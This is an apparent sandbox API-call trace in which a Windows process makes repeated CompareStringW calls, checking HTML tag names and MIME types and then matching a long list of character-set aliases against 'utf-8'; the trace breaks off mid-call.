1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="META", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TITLE", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="SCRIPT", cchCount2=6) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="LINK", cchCount2=4) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/html", cchCount1=9, lpString2="application/xml", cchCount2=15) returned 3 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/html", cchCount1=9, lpString2="application/xml-external-parsed-entity", cchCount2=38) returned 3 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/html", cchCount1=9, lpString2="application/xml-dtd", cchCount2=19) returned 3 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/html", cchCount1=5, lpString2="text/", cchCount2=5) returned 2 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="utf-8", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="US-ASCII", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.4-1968", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-6", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.4-1986", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.irv:1991", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASCII", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-US", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="us", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM367", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp367", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csASCII", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-10646-UTF-1", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO10646UTF1", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.basic:1983", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ref", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO646basic1983", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INVARIANT", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csINVARIANT", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.irv:1983", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-2", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="irv", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2IntlRefVersion", cchCount1=20, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BS_4730", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-4", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-GB", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gb", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uk", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO4UnitedKingdom", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-SEFI", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-8-1", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSSEFI", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-SEFI-ADD", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-8-2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSSEFIADD", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.712] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-DANO", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-9-1", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSDANO", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-DANO-ADD", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-9-2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSDANOADD", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEN_850200_B", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-10", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FI", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FI", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-SE", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO10Swedish", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEN_850200_C", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-11", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-SE2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se2", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO11SwedishForNames", cchCount1=22, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS_C_5601-1987", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-149", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS_C_5601-1989", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSC_5601", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="korean", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csKSC56011987", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-KR", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022KR", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EUC-KR", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEUCKR", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-JP", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022JP", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-JP-2", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022JP2", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-CN", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-CN-EXT", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969-jp", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-13", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="katakana", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0201-7", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 3 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO13JISC6220jp", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969-ro", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-14", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-JP", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO14JISC6220ro", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IT", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-15", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-IT", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO15Italian", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PT", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-16", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-PT", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO16Portuguese", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-17", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-ES", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO17Spanish", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek7-old", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-18", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO18Greek7Old", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin-greek", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-19", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO19LatinGreek", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DIN_66003", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-21", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="de", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-DE", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO21German", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF_Z_62-010_(1973)", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-25", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FR1", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO25French", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Latin-greek-1", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-27", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO27LatinGreek1", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5427", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-37", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO5427Cyrillic", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6226-1978", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-42", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO42JISC62261978", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BS_viewdata", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-47", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.715] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO47BSViewdata", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS", cchCount1=4, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-49", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO49INIS", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS-8", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-50", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO50INIS8", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS-cyrillic", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-51", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO51INISCyrillic", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5427:1981", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-54", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO5427Cyrillic1981", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5428:1980", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-55", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO5428Greek", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_1988-80", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-57", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cn", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-CN", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO57GB1988", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_2312-80", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-58", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="chinese", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO58GB231280", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NS_4551-1", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-60", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-NO", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO60DanishNorwegian", cchCount1=22, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO60Norwegian1", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NS_4551-2", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-NO2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-61", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no2", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO61Norwegian2", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF_Z_62-010", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-69", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FR", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fr", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO69French", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="videotex-suppl", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 3 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-70", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO70VideotexSupp1", cchCount1=20, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PT2", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-84", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-PT2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO84Portuguese2", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES2", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-85", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-ES2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO85Spanish2", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSZ_7795.3", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-86", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-HU", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hu", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO86Hungarian", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6226-1983", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-87", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0208", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 3 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_X0208-1983", cchCount1=14, 